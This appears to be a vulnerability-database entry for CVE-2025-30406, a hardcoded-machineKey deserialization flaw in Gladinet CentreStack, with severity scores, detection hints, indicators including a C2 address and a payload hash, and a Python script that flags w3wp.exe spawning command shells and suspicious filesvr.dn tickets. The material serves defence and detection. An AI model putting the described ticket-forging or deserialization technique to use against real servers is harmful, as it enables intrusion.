CVE-2025-30406
published 2025-04-03


Priority: P198 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability (due 2025-04-29)
Exploited in the wild
EPSS: 92.73% (99.8th percentile)
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution. NOTE: a CentreStack admin can manually delete the machineKey defined in portal\web.config.

Affected

1 range

Vendor     Product       Version range         Fixed in
gladinet   centrestack   < 16.4.10315.56368    16.4.10315.56368

Detection & IOCs (extracted from sources)

  • Monitor Windows Application Event Log for Event ID 1316, which captures ViewState deserialization attack payloads (base64-encoded) submitted to the CentreStack portal.
  • Alert on child process creation from w3wp.exe spawning cmd.exe or powershell.exe, which indicates server-side code execution via ViewState deserialization.
  • Detect HTTP GET requests to /storage/filesvr.dn with a 't' parameter containing long base64-like encrypted ticket strings — these are exploitation attempts to download web.config via the hardcoded AES key.
  • Flag access tickets in /storage/filesvr.dn requests that decrypt to a timestamp in the year 9999, indicating a crafted never-expiring ticket used by attackers to persistently download web.config.
  • Hunt for the file C:\programdata\CentreStac_log.txt on CentreStack servers, which attackers created to exfiltrate ipconfig /all output via the LFI vulnerability.
  • The conqueror.exe payload (SHA256: e9fa82d92d826c6a1c38165fe6bd610d3b80cd5d53ec65ac3fe94393be64b5a5) was not present on the file system for further analysis and was not found on VirusTotal at time of writing; the C2 server at 185.196.11.207:8000 was also offline, limiting further artifact recovery.
  • Attribution to the cl0p ransomware group for the December 15 incidents could not be definitively confirmed at time of reporting; Huntress flagged it as suspected based on timing of external intelligence reports.
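Two of the detections above, as an added example that is not part of the page's sources: a w3wp.exe child-process check and a filter for unusually long 't' tickets on /storage/filesvr.dn, run over constructed process-creation events and IIS-style log lines (the log field layout and the ticket shape are assumptions for the example).

```python
import re
from urllib.parse import parse_qs

# Constructed sample data for this example (not telemetry from the incident).
PROC_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "child": r"C:\Windows\System32\cmd.exe"},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "child": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"parent": r"C:\Windows\explorer.exe", "child": r"C:\Windows\System32\cmd.exe"},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "child": r"C:\Windows\System32\conhost.exe"},
]
LONG_TICKET = "A" * 40 + ":aCLI:" + "B" * 30   # assumed shape of a long encrypted ticket blob
IIS_LINES = [  # assumed W3C-style fields: date time method uri-stem uri-query status
    f"2025-12-15 10:01:02 GET /storage/filesvr.dn t={LONG_TICKET} 200",
    "2025-12-15 10:01:05 GET /storage/filesvr.dn t=short 404",
    "2025-12-15 10:01:09 GET /portal/index.aspx - 200",
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Base64-like alphabet plus the ':' and '|' separators that appear in the ticket values.
TICKET_RE = re.compile(r"^[A-Za-z0-9+/=:|_-]+$")


def basename_lower(path):
    """Last path component, lower-cased, so image paths compare by executable name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_children(events):
    """IIS worker (w3wp.exe) spawning a command shell: server-side code execution signal."""
    return [e for e in events
            if basename_lower(e["parent"]) == "w3wp.exe"
            and basename_lower(e["child"]) in SHELLS]


def suspicious_ticket_requests(lines, min_len=64):
    """GET /storage/filesvr.dn whose 't' parameter is a long base64-like ticket string."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 6 or fields[2] != "GET" or fields[3].lower() != "/storage/filesvr.dn":
            continue
        ticket = parse_qs(fields[4]).get("t", [""])[0]   # '-' (no query) yields an empty ticket
        if len(ticket) >= min_len and TICKET_RE.fullmatch(ticket):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for e in suspicious_children(PROC_EVENTS):
        print("ALERT w3wp.exe ->", basename_lower(e["child"]))
    for line in suspicious_ticket_requests(IIS_LINES):
        print("ALERT long filesvr.dn ticket:", line)
```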

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck   -         9.8     CRITICAL   -
cisa        -         9.8     CRITICAL   -